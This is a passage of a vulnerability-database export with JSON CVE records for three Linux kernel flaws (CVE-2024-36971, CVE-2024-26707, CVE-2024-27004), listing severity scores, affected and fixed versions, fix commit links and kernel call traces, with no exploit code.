"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36971",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-08T03:55:25.565547Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2024-08-07",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-36971"
},
"type": "kev"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T22:56:22.761Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-36971"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-08-07T00:00:00+00:00",
"value": "CVE-2024-36971 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/dst_ops.h",
"include/net/sock.h",
"net/ipv4/route.c",
"net/ipv6/route.c",
"net/xfrm/xfrm_policy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "051c0bde9f0450a2ec3d62a86d2a0d2fad117f13",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "db0082825037794c5dba9959c9de13ca34cc5e72",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "2295a7ef5c8c49241bff769e7826ef2582e532a6",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "eacb8b195579c174a6d3e12a9690b206eb7f28cf",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "81dd3c82a456b0015461754be7cb2693991421b4",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "5af198c387128a9d2ddd620b0f0803564a4d4508",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "b8af8e6118a6605f0e495a58d591ca94a85a50fc",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
},
{
"lessThan": "92f1655aa2b2294d0b49925f3b875a634bd3b59e",
"status": "affected",
"version": "a87cb3e48ee86d29868d3f59cfb9ce1a8fa63314",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/dst_ops.h",
"include/net/sock.h",
"net/ipv4/route.c",
"net/ipv6/route.c",
"net/xfrm/xfrm_policy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.6"
},
{
"lessThan": "4.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.94",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.34",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.94",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.34",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fix __dst_negative_advice() race\n\n__dst_negative_advice() does not enforce proper RCU rules when\nsk-\u003edst_cache must be cleared, leading to possible UAF.\n\nRCU rules are that we must first clear sk-\u003esk_dst_cache,\nthen call dst_release(old_dst).\n\nNote that sk_dst_reset(sk) is implementing this protocol correctly,\nwhile __dst_negative_advice() uses the wrong order.\n\nGiven that ip6_negative_advice() has special logic\nagainst RTF_CACHE, this means each of the three -\u003enegative_advice()\nexisting methods must perform the sk_dst_reset() themselves.\n\nNote the check against NULL dst is centralized in\n__dst_negative_advice(), there is no need to duplicate\nit in various callbacks.\n\nMany thanks to Clement Lecigne for tracking this issue.\n\nThis old bug became visible after the blamed commit, using UDP sockets."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:13:06.632Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/051c0bde9f0450a2ec3d62a86d2a0d2fad117f13"
},
{
"url": "https://git.kernel.org/stable/c/db0082825037794c5dba9959c9de13ca34cc5e72"
},
{
"url": "https://git.kernel.org/stable/c/2295a7ef5c8c49241bff769e7826ef2582e532a6"
},
{
"url": "https://git.kernel.org/stable/c/eacb8b195579c174a6d3e12a9690b206eb7f28cf"
},
{
"url": "https://git.kernel.org/stable/c/81dd3c82a456b0015461754be7cb2693991421b4"
},
{
"url": "https://git.kernel.org/stable/c/5af198c387128a9d2ddd620b0f0803564a4d4508"
},
{
"url": "https://git.kernel.org/stable/c/b8af8e6118a6605f0e495a58d591ca94a85a50fc"
},
{
"url": "https://git.kernel.org/stable/c/92f1655aa2b2294d0b49925f3b875a634bd3b59e"
}
],
"title": "net: fix __dst_negative_advice() race",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36971",
"datePublished": "2024-06-10T09:03:23.878Z",
"dateReserved": "2024-05-30T15:25:07.082Z",
"dateUpdated": "2025-11-04T17:21:17.010Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26707 (GCVE-0-2024-26707)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: hsr: remove WARN_ONCE() in send_hsr_supervision_frame()
Syzkaller reported [1] hitting a warning after failing to allocate
resources for skb in hsr_init_skb(). Since a WARN_ONCE() call will
not help much in this case, it might be prudent to switch to
netdev_warn_once(). At the very least it will suppress syzkaller
reports such as [1].
Just in case, use netdev_warn_once() in send_prp_supervision_frame()
for similar reasons.
[1]
HSR: Could not send supervision frame
WARNING: CPU: 1 PID: 85 at net/hsr/hsr_device.c:294 send_hsr_supervision_frame+0x60a/0x810 net/hsr/hsr_device.c:294
RIP: 0010:send_hsr_supervision_frame+0x60a/0x810 net/hsr/hsr_device.c:294
...
Call Trace:
<IRQ>
hsr_announce+0x114/0x370 net/hsr/hsr_device.c:382
call_timer_fn+0x193/0x590 kernel/time/timer.c:1700
expire_timers kernel/time/timer.c:1751 [inline]
__run_timers+0x764/0xb20 kernel/time/timer.c:2022
run_timer_softirq+0x58/0xd0 kernel/time/timer.c:2035
__do_softirq+0x21a/0x8de kernel/softirq.c:553
invoke_softirq kernel/softirq.c:427 [inline]
__irq_exit_rcu kernel/softirq.c:632 [inline]
irq_exit_rcu+0xb7/0x120 kernel/softirq.c:644
sysvec_apic_timer_interrupt+0x95/0xb0 arch/x86/kernel/apic/apic.c:1076
</IRQ>
<TASK>
asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:649
...
This issue is also found in older kernels (at least up to 5.10).
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef Version: 121c33b07b3127f501b366bc23d2a590e2f2b8ef |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.854Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d8011a878fdf96123bc0d6a12e2fe7ced5fddfb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de769423b2f053182a41317c4db5a927e90622a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56440799fc4621c279df16176f83a995d056023a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/923dea2a7ea9e1ef5ac4031fba461c1cc92e32b8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/547545e50c913861219947ce490c68a1776b9b51"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37e8c97e539015637cb920d3e6f1e404f707a06e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26707",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:36.137987Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:53.817Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0d8011a878fdf96123bc0d6a12e2fe7ced5fddfb",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
},
{
"lessThan": "de769423b2f053182a41317c4db5a927e90622a0",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
},
{
"lessThan": "56440799fc4621c279df16176f83a995d056023a",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
},
{
"lessThan": "923dea2a7ea9e1ef5ac4031fba461c1cc92e32b8",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
},
{
"lessThan": "547545e50c913861219947ce490c68a1776b9b51",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
},
{
"lessThan": "37e8c97e539015637cb920d3e6f1e404f707a06e",
"status": "affected",
"version": "121c33b07b3127f501b366bc23d2a590e2f2b8ef",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hsr: remove WARN_ONCE() in send_hsr_supervision_frame()\n\nSyzkaller reported [1] hitting a warning after failing to allocate\nresources for skb in hsr_init_skb(). Since a WARN_ONCE() call will\nnot help much in this case, it might be prudent to switch to\nnetdev_warn_once(). At the very least it will suppress syzkaller\nreports such as [1].\n\nJust in case, use netdev_warn_once() in send_prp_supervision_frame()\nfor similar reasons.\n\n[1]\nHSR: Could not send supervision frame\nWARNING: CPU: 1 PID: 85 at net/hsr/hsr_device.c:294 send_hsr_supervision_frame+0x60a/0x810 net/hsr/hsr_device.c:294\nRIP: 0010:send_hsr_supervision_frame+0x60a/0x810 net/hsr/hsr_device.c:294\n...\nCall Trace:\n \u003cIRQ\u003e\n hsr_announce+0x114/0x370 net/hsr/hsr_device.c:382\n call_timer_fn+0x193/0x590 kernel/time/timer.c:1700\n expire_timers kernel/time/timer.c:1751 [inline]\n __run_timers+0x764/0xb20 kernel/time/timer.c:2022\n run_timer_softirq+0x58/0xd0 kernel/time/timer.c:2035\n __do_softirq+0x21a/0x8de kernel/softirq.c:553\n invoke_softirq kernel/softirq.c:427 [inline]\n __irq_exit_rcu kernel/softirq.c:632 [inline]\n irq_exit_rcu+0xb7/0x120 kernel/softirq.c:644\n sysvec_apic_timer_interrupt+0x95/0xb0 arch/x86/kernel/apic/apic.c:1076\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:649\n...\n\nThis issue is also found in older kernels (at least up to 5.10)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:31.739Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0d8011a878fdf96123bc0d6a12e2fe7ced5fddfb"
},
{
"url": "https://git.kernel.org/stable/c/de769423b2f053182a41317c4db5a927e90622a0"
},
{
"url": "https://git.kernel.org/stable/c/56440799fc4621c279df16176f83a995d056023a"
},
{
"url": "https://git.kernel.org/stable/c/923dea2a7ea9e1ef5ac4031fba461c1cc92e32b8"
},
{
"url": "https://git.kernel.org/stable/c/547545e50c913861219947ce490c68a1776b9b51"
},
{
"url": "https://git.kernel.org/stable/c/37e8c97e539015637cb920d3e6f1e404f707a06e"
}
],
"title": "net: hsr: remove WARN_ONCE() in send_hsr_supervision_frame()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26707",
"datePublished": "2024-04-03T14:55:10.262Z",
"dateReserved": "2024-02-19T14:20:24.158Z",
"dateUpdated": "2025-05-04T08:54:31.739Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27004 (GCVE-0-2024-27004)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: Get runtime PM before walking tree during disable_unused
Doug reported [1] the following hung task:
INFO: task swapper/0:1 blocked for more than 122 seconds.
Not tainted 5.15.149-21875-gf795ebc40eb8 #1
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:swapper/0 state:D stack: 0 pid: 1 ppid: 0 flags:0x00000008
Call trace:
__switch_to+0xf4/0x1f4
__schedule+0x418/0xb80
schedule+0x5c/0x10c
rpm_resume+0xe0/0x52c
rpm_resume+0x178/0x52c
__pm_runtime_resume+0x58/0x98
clk_pm_runtime_get+0x30/0xb0
clk_disable_unused_subtree+0x58/0x208
clk_disable_unused_subtree+0x38/0x208
clk_disable_unused_subtree+0x38/0x208
clk_disable_unused_subtree+0x38/0x208
clk_disable_unused_subtree+0x38/0x208
clk_disable_unused+0x4c/0xe4
do_one_initcall+0xcc/0x2d8
do_initcall_level+0xa4/0x148
do_initcalls+0x5c/0x9c
do_basic_setup+0x24/0x30
kernel_init_freeable+0xec/0x164
kernel_init+0x28/0x120
ret_from_fork+0x10/0x20
INFO: task kworker/u16:0:9 blocked for more than 122 seconds.
Not tainted 5.15.149-21875-gf795ebc40eb8 #1
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/u16:0 state:D stack: 0 pid: 9 ppid: 2 flags:0x00000008
Workqueue: events_unbound deferred_probe_work_func
Call trace:
__switch_to+0xf4/0x1f4
__schedule+0x418/0xb80
schedule+0x5c/0x10c
schedule_preempt_disabled+0x2c/0x48
__mutex_lock+0x238/0x488
__mutex_lock_slowpath+0x1c/0x28
mutex_lock+0x50/0x74
clk_prepare_lock+0x7c/0x9c
clk_core_prepare_lock+0x20/0x44
clk_prepare+0x24/0x30
clk_bulk_prepare+0x40/0xb0
mdss_runtime_resume+0x54/0x1c8
pm_generic_runtime_resume+0x30/0x44
__genpd_runtime_resume+0x68/0x7c
genpd_runtime_resume+0x108/0x1f4
__rpm_callback+0x84/0x144
rpm_callback+0x30/0x88
rpm_resume+0x1f4/0x52c
rpm_resume+0x178/0x52c
__pm_runtime_resume+0x58/0x98
__device_attach+0xe0/0x170
device_initial_probe+0x1c/0x28
bus_probe_device+0x3c/0x9c
device_add+0x644/0x814
mipi_dsi_device_register_full+0xe4/0x170
devm_mipi_dsi_device_register_full+0x28/0x70
ti_sn_bridge_probe+0x1dc/0x2c0
auxiliary_bus_probe+0x4c/0x94
really_probe+0xcc/0x2c8
__driver_probe_device+0xa8/0x130
driver_probe_device+0x48/0x110
__device_attach_driver+0xa4/0xcc
bus_for_each_drv+0x8c/0xd8
__device_attach+0xf8/0x170
device_initial_probe+0x1c/0x28
bus_probe_device+0x3c/0x9c
deferred_probe_work_func+0x9c/0xd8
process_one_work+0x148/0x518
worker_thread+0x138/0x350
kthread+0x138/0x1e0
ret_from_fork+0x10/0x20
The first thread is walking the clk tree and calling
clk_pm_runtime_get() to power on devices required to read the clk
hardware via struct clk_ops::is_enabled(). This thread holds the clk
prepare_lock, and is trying to runtime PM resume a device, when it finds
that the device is in the process of resuming so the thread schedule()s
away waiting for the device to finish resuming before continuing. The
second thread is runtime PM resuming the same device, but the runtime
resume callback is calling clk_prepare(), trying to grab the
prepare_lock waiting on the first thread.
This is a classic ABBA deadlock. To properly fix the deadlock, we must
never runtime PM resume or suspend a device with the clk prepare_lock
held. Actually doing that is near impossible today because the global
prepare_lock would have to be dropped in the middle of the tree, the
device runtime PM resumed/suspended, and then the prepare_lock grabbed
again to ensure consistency of the clk tree topology. If anything
changes with the clk tree in the meantime, we've lost and will need to
start the operation all over again.
Luckily, most of the time we're simply incrementing or decrementing the
runtime PM count on an active device, so we don't have the chance to
schedule away with the prepare_lock held. Let's fix this immediate
problem that can be
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 Version: 9a34b45397e5a389e25a0c5d39983300d040e5e2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27004",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:40:33.489522Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:46:18.836Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:16:29.861Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/253ab38d1ee652a596942156978a233970d185ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4af115f1a20a3d9093586079206ee37c2ac55123"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a29ec0465dce0b871003698698ac6fa92c9a5034"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a424e713e0cc33d4b969cfda25b9f46df4d7b5bc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/60ff482c4205a5aac3b0595ab794cfd62295dab5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/115554862294397590088ba02f11f2aba6d5016c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e581cf5d216289ef292d1a4036d53ce90e122469"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/clk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "253ab38d1ee652a596942156978a233970d185ba",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "4af115f1a20a3d9093586079206ee37c2ac55123",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "a29ec0465dce0b871003698698ac6fa92c9a5034",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "a424e713e0cc33d4b969cfda25b9f46df4d7b5bc",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "60ff482c4205a5aac3b0595ab794cfd62295dab5",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "115554862294397590088ba02f11f2aba6d5016c",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
},
{
"lessThan": "e581cf5d216289ef292d1a4036d53ce90e122469",
"status": "affected",
"version": "9a34b45397e5a389e25a0c5d39983300d040e5e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/clk.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
